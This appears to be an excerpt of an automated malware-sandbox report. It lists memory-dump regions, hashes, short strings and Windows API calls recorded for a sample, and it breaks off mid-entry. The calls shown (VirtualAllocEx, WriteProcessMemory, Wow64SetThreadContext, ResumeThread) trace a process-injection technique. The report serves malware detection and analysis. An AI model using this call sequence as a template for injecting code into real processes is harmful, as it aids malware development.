                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: f4a4071ae21d0bf71c134131e045464e49a30f97b7132148da4f680f6fb67d49
                                                • Instruction ID: 71162f31900163275a483750375e64b511eaacb4fa49be08056e4563c680641f
                                                • Opcode Fuzzy Hash: f4a4071ae21d0bf71c134131e045464e49a30f97b7132148da4f680f6fb67d49
                                                • Instruction Fuzzy Hash: 92A1F370D002199FDF20CFA9C885BEDBBF1BF09310F14A169E859A7280EB749985CF85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q
                                                • API String ID: 0-1007455737
                                                • Opcode ID: a582957ca7ed6cafbfc51eb269f749b07263d48db0f09bc5a161b1372614701b
                                                • Instruction ID: af3331123bc5810c3442935174787bee14a7b3c707245eabf29bd383883fb2b9
                                                • Opcode Fuzzy Hash: a582957ca7ed6cafbfc51eb269f749b07263d48db0f09bc5a161b1372614701b
                                                • Instruction Fuzzy Hash: 0102D0717042429FE714AF28D8517AE7BE2EFC5304F248429E685CB392EA34FD42DB52
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05506B28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 504ba3655b00991582edab95d2fc2803eac81f152eb8b51197bd8ba059efece3
                                                • Instruction ID: f5bb43acf84efbfb8ecddb139c640cf2f367ece9a06e3e547fd4d5daa82c6413
                                                • Opcode Fuzzy Hash: 504ba3655b00991582edab95d2fc2803eac81f152eb8b51197bd8ba059efece3
                                                • Instruction Fuzzy Hash: A541DDB5D012589FCF00DFA9D984AEEFBF1FB09310F20902AE419B7240D738AA45CB94
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05506B28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05506B28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 05505DC7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05506842
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05506842
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 05505DC7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0548DC14
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125779245.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5480000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 05505DC7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 05506E6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 05506E6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq
                                                • API String ID: 0-600464949
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq
                                                • API String ID: 0-600464949
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJbq
                                                • API String ID: 0-1760495472
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJbq
                                                • API String ID: 0-1760495472
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq
                                                • API String ID: 0-3092978723
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq
                                                • API String ID: 0-600464949
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126459321.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5710000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq
                                                • API String ID: 0-600464949
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0548EDD7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125779245.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5480000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p<]q
                                                • API String ID: 0-1327301063
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p<]q
                                                • API String ID: 0-1327301063
                                                • Opcode ID: 70637a35572a89b1139b6c2d4d18805b60d3a47f79633a020d418f4bb2c7cca9
                                                • Instruction ID: f7371b11433a484d8128b12244def8a7081f4b71ee1a79d8dff319827f956dd0
                                                • Opcode Fuzzy Hash: 70637a35572a89b1139b6c2d4d18805b60d3a47f79633a020d418f4bb2c7cca9
                                                • Instruction Fuzzy Hash: DC2138713001549FCB15DF2ACC40AAA7BFAAF89315B0940A5FD45CB2B1CA35EC51CB60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq
                                                • API String ID: 0-3092978723
                                                • Opcode ID: c51919f973d24d0a8847634f890ce1e603a911bb60e36ea235e9c470191e5eae
                                                • Instruction ID: fc8c1fd7a7675217a11f27adbd8eed8392182d10175abf58d1ebfdb3de67ff7f
                                                • Opcode Fuzzy Hash: c51919f973d24d0a8847634f890ce1e603a911bb60e36ea235e9c470191e5eae
                                                • Instruction Fuzzy Hash: 32116D34700109CFCB04DFA9C89496EBBB6EF89341F118166EA05DB365DB71EC01CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8aq
                                                • API String ID: 0-538729646
                                                • Opcode ID: 42403f5480d73b0a17c45ef76b6193ff910e865f83db47774079bcfcf886c25c
                                                • Instruction ID: 6b0b690f5c246ad8704f7a18c2d91cf336abf6b51fc38ca6283e36f5ac04e3a0
                                                • Opcode Fuzzy Hash: 42403f5480d73b0a17c45ef76b6193ff910e865f83db47774079bcfcf886c25c
                                                • Instruction Fuzzy Hash: AC112135604100CFD700EB69D884BA9B7E6FBC9324F15816AE5028F3A5C774EC8ADF51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: n
                                                • API String ID: 0-2013832146
                                                • Opcode ID: 19645b6ec5336653556d32002dcad421c5a18aed0ecf034d4dede72c265eef42
                                                • Instruction ID: f787775ebee6f71fb05d3b11e93d00f9c4ff2063523a42d7a0e5f671a5926ebc
                                                • Opcode Fuzzy Hash: 19645b6ec5336653556d32002dcad421c5a18aed0ecf034d4dede72c265eef42
                                                • Instruction Fuzzy Hash: 88F05234C443A8EFDB609F20D5987E9BBB1FB09315F1014EAD019A2221C7762AE6CE01
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: n
                                                • API String ID: 0-2013832146
                                                • Opcode ID: 99e9884ff776eabf5f257eeb3892c46e41e8ad64bebef540d9dd39db4ae49e37
                                                • Instruction ID: 152dab7bc8b47be88b4592d1a291e6ed102975007e2be29e2d668fc337b94af3
                                                • Opcode Fuzzy Hash: 99e9884ff776eabf5f257eeb3892c46e41e8ad64bebef540d9dd39db4ae49e37
                                                • Instruction Fuzzy Hash: 69F03975C443A8DFDBA19F14C5947E9BBF1FB05305F0015D9C02AA2260CBB52AD6CF42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ]
                                                • API String ID: 0-3352871620
                                                • Opcode ID: 7d4e8383395810e057b49d91d2ca6ef20f92959676cc2fcd8f56d8ec92358744
                                                • Instruction ID: 516a97f90c01a0c678c593d3031f747f4193537008742a8cf0cf63393ffe5d29
                                                • Opcode Fuzzy Hash: 7d4e8383395810e057b49d91d2ca6ef20f92959676cc2fcd8f56d8ec92358744
                                                • Instruction Fuzzy Hash: E7E09274906219CBEB60CF64C988BDDBBB2AB09315F2411D9C508722A0DB35AAC6DE09
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: >
                                                • API String ID: 0-325317158
                                                • Opcode ID: 28f755494705593847f80e1fe09c4bc5e1cb4b53f4a2b90c8e20107d316f51c4
                                                • Instruction ID: 2f3736e413f820ec731cb9f015f503048d63010557b5ab945a527ee8ac476342
                                                • Opcode Fuzzy Hash: 28f755494705593847f80e1fe09c4bc5e1cb4b53f4a2b90c8e20107d316f51c4
                                                • Instruction Fuzzy Hash: A8B01231989254CFC7109F10CE497FE7B71BB42346F0811C9900E32090CB741EC5CE01
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d640eb4a46c57213663056e8fa1edbc8eed2b90db46d6eda3a43c9c46e13172
                                                • Instruction ID: 57f3c3b72927507e3c5310bdc4f0cb1628ab115844248d512f6ff93c33c5fb53
                                                • Opcode Fuzzy Hash: 3d640eb4a46c57213663056e8fa1edbc8eed2b90db46d6eda3a43c9c46e13172
                                                • Instruction Fuzzy Hash: 3D120634A002188FDB14EF68CC94B9DBBB2BF89304F5195A8D54AAB365DB30ED85CF50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3df9847755183ab6adcabb90207f2c5f5801d5d20f90ca17d60abfa4bd03cf48
                                                • Instruction ID: b206960454f45ad70bb6de42cc9cc6a4798e9ccf115a5556d3ef00778a32b688
                                                • Opcode Fuzzy Hash: 3df9847755183ab6adcabb90207f2c5f5801d5d20f90ca17d60abfa4bd03cf48
                                                • Instruction Fuzzy Hash: 68A17E35B00104CFDB04DB78D858BE97BF2FF88311F25806AE9069B3A5DA35AC86DB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c5d13cdd48a9d0e4c7caece9ccac22db25cf3f507cb30ec52015e9aab7561c7d
                                                • Instruction ID: d7567b0ee19b9593ac0a91103c43941a7687190e15b8e3611119bd2e70292d3d
                                                • Opcode Fuzzy Hash: c5d13cdd48a9d0e4c7caece9ccac22db25cf3f507cb30ec52015e9aab7561c7d
                                                • Instruction Fuzzy Hash: F3A14935B00109CFDB44DB68D898BA977F2FF88311F258066E6069B3A4DB35AC86DB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ce5e1018178c4fa5d8e8cc1ae627f0bf945a82f18ea560c3602a7151711b526
                                                • Instruction ID: 5c9b5d6b381a5a317cab9db6cac0338c7ba4b92f8ff35422baf75d794e39d483
                                                • Opcode Fuzzy Hash: 6ce5e1018178c4fa5d8e8cc1ae627f0bf945a82f18ea560c3602a7151711b526
                                                • Instruction Fuzzy Hash: 8C919F35B012049FCB04DFA5D954AADBBF2FF88315F258469E905AB392CB35ED42CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6e977a805b49d1255eedb2d04f5b17f8ffbbdab80ddae305da59ba3c3c7c07b
                                                • Instruction ID: c0fbd6b19427e9893f642d91f2c67c1c51b932a7caa53e46dab2412fd44fb43c
                                                • Opcode Fuzzy Hash: c6e977a805b49d1255eedb2d04f5b17f8ffbbdab80ddae305da59ba3c3c7c07b
                                                • Instruction Fuzzy Hash: DA915B35B00104CFDB48DB68D858BA977F2FF88711F258066EA069B3A4DA35AC86DB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66352837ef2d00cc93c458de7138d8797d9eb80b20514243d97003e6be09e2a8
                                                • Instruction ID: 0ecebdb4963c3dcc330f2a29699cb0037bfd50e89105f024ea0a565deb8ce74f
                                                • Opcode Fuzzy Hash: 66352837ef2d00cc93c458de7138d8797d9eb80b20514243d97003e6be09e2a8
                                                • Instruction Fuzzy Hash: 85A15B35B00105CFDB44DB68D898BA977F2FF88311F25806AE6069B3A4DB35EC86DB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b5690f395f309131b7b49b38b090e72c81290b8afa7133ec2f814bca2a4d8683
                                                • Instruction ID: f400019a66c642b82343de05daa857e9732300e2e0ec3c310bfa34b5ed394458
                                                • Opcode Fuzzy Hash: b5690f395f309131b7b49b38b090e72c81290b8afa7133ec2f814bca2a4d8683
                                                • Instruction Fuzzy Hash: E8812A34710618DFDB04EF68D894AADBBB6BF89714F1440A9E506DB3A1CB34AD42CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb104a8d9d75b44d473505d6c6906d220cf4a073506280781101bb11dc108635
                                                • Instruction ID: 982c51f91e68d454f2220fdf7f6cc3d47d6c98c58875af5bdc10fda29fece21c
                                                • Opcode Fuzzy Hash: eb104a8d9d75b44d473505d6c6906d220cf4a073506280781101bb11dc108635
                                                • Instruction Fuzzy Hash: B891EE70E0820CCBEF28CFA9D5887FDBBF2BB49345F14506AD809A7295D7794896CB10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d8ab7dc7348b2580801a70adaeae4140f0cef94ff955c53e5463c9bccab3c45
                                                • Instruction ID: e165319c43488dd69a373aea05368fd3724f6ede86da33a8a898ac4941a6d1cb
                                                • Opcode Fuzzy Hash: 0d8ab7dc7348b2580801a70adaeae4140f0cef94ff955c53e5463c9bccab3c45
                                                • Instruction Fuzzy Hash: C3810435A40218CFDB14DFA8C98499EBBF5FF88314B1585A9E9069B361DB31ED42CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8675dcb44fe5b5b41f75fab0cfaec9c2a82003132caabd186acfe82fc2e736f8
                                                • Instruction ID: 44f6221a87ed51c33ed328c86d94472143ee8b80b40ec3a54c142b560a264881
                                                • Opcode Fuzzy Hash: 8675dcb44fe5b5b41f75fab0cfaec9c2a82003132caabd186acfe82fc2e736f8
                                                • Instruction Fuzzy Hash: 4981BF70E01218CFDB54DFA9E988AEDBBB2FB89301F10816AD419A7355DB746D86CF40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef917e13349a3683b5a18970fb46ba4188bf463fae20ef30e46831f07e3ba3fa
                                                • Instruction ID: ed0683d990be4ef1073c24ba8cbbfedc08f562091bb1fbd11fc1f172b4ea11cd
                                                • Opcode Fuzzy Hash: ef917e13349a3683b5a18970fb46ba4188bf463fae20ef30e46831f07e3ba3fa
                                                • Instruction Fuzzy Hash: 8471ACB1D05208CFEB04CFA8D9887EDBBF0AF48314F20516AD819B6240D3B90A89EF55
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fadcecfd3b556d86202984b5ee1c176aa57ce25c0365dbb4183e97f93ef58a88
                                                • Instruction ID: 387e6c2b204c19c125384231d8d86d8093c0675e31c105feb74ce9e29f756504
                                                • Opcode Fuzzy Hash: fadcecfd3b556d86202984b5ee1c176aa57ce25c0365dbb4183e97f93ef58a88
                                                • Instruction Fuzzy Hash: 52710871E01208DFDB04DFA9E544AEDBBF2FF48305F209069D40AA7260DB746A46CF91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e75427402530e55552ccfaa54c9e5526cab57f08c859b310a168f54d7b95dd66
                                                • Instruction ID: 0df8734550a94d9141282064862d7fe0c6649aa9821af5cdfceedbfc9f541927
                                                • Opcode Fuzzy Hash: e75427402530e55552ccfaa54c9e5526cab57f08c859b310a168f54d7b95dd66
                                                • Instruction Fuzzy Hash: 3371BF70E1561CCFDB24DFAAD984BEDBBB6BF8A304F10916AD00AA7255DB345846CF00
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ce091cac0768a794dc799be30ccf810caf4625595380c6724077c88aff21e3b
